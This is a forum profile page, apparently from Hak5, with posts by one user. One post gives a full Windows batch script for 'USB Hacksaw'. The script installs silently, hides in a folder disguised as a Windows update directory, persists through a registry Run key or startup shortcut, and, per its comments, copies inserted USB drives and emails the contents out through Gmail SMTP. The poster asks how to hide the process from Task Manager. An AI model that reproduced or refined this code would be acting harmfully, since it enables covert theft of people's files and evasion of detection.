Jump to content


  • Posts

  • Joined

  • Last visited

Posts posted by brfield

  1. With hidden "Files and Folders" enabled you will still be screwed. You have to follow this process-I had the same problem:


    Then edit the send.bat

  2. I have made this to auto run on non u3 drives silently and have done some other tweaks to make this more efficient but I cannot for the life of me get cmd to exit automatically!

    The window never shows you don't see a thing but how do i get it to exit? If you open task manager under processes you will see cmd.exe can i make this kill itself or exit?

    if exist C:Void.txt GOTO end
    ::Use /\/\ to keep from infecting yourself
    :: Payload:Hacksaw | Auth:Hak5 POC Solution | Ver:0.1poc
    :: Props: core-dump, pseudobreed, poyboy, gmullen, cooper, boristsr, moonlit, VaKo, 404, stingray, dlss
    :: The purpose of this hack, dubbed USB Hacksaw for googleability, is to automatically and silently 
    :: install on windows 2000, XP, or 2003 machines with either administrator or guest access. 
    :: Installation consists of hiding the hacksaw tools in a hidden folder, add to either registry or
    :: startup folder depening on user rights, and start the program.
    :: This hack is based on a modified version of USBDumper. Once installed on a targert machine it will 
    :: stay resident and wait for a USB flash drive to be inserted. Once a USB flash drive is inserted the 
    :: hacksaw will download the contents of the drive to a temporary location using the modified USBDumper,
    :: then silently run the send.bat file located in the same directory, which will then archive the contents 
    :: using RAR, eastablish an SSL SMTP connection to smtp.gmail.com using Stunnel and Blat, email the 
    :: downloaded data to an email address, and remove the documents and archives.
    :: The proof of concept code in this 0.1 version is not as pretty as it could be. Originally a method
    :: for determining user rights and thus installing accordingly was planned, however problems with the 
    :: IFMEMBER command were found and many dirty hacks followed. Future versions are expected to use a more
    :: elegent method of determining user privledges. (Thinking outloud: try creating a file where guests
    :: shouldnt be able to and check errorlevel).
    :: Development of this project has been done with the aid of the Hak.5 community at www.hak5.org
    :: Programs used:
    :: USBDumper -- http://www.secuobs.com/news/07062006-sstic_usbdumper.shtml
    :: Stunnel -- http://www.stunnel.org/
    :: Blat -- http://www.blat.net/
    :: Shortcut --  http://www.optimumx.com/download/#Shortcut
    :: Rar -- http://www.rarlabs.com/
    :: More information and future developments of this hack can be found at:
    :: http://www.hak5.org/wiki/USB_Hacksaw
    :: If admin make windows\$NtUninstallKB931337$, else make %appdata%\sbs
    mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs"
    :: go to payload directory
    cd \WIP\SBS
    :: remove hidden and system attributes (makes next copy command happy, probably better way to do this)
    attrib *.* -s -h
    :: copy payload to target
    copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs"
    :: reapply hidden and system attributes
    attrib *.* +s +h
    :: If admin register USB Hacksaw as startup program in registry, else do it the yucky way
    reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico"
    :: Hide USB Hacksaw
    attrib %systemroot%\$NtUninstallKB931337$ +s +h & attrib "%appdata%\sbs" +s +h
    :: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below)
    :: "%systemroot%\$NtUninstallKB931337$\sbs.exe" || "%appdata%\sbs\sbs.exe"
    cd \
    cd %systemroot%
    cd $NtUninstallKB931337$

    I have tried:



    taskkill /f /cmd.exe

    exit /b 1


    How can I make it end itself? Make it not seen in Task Manager

  • Create New...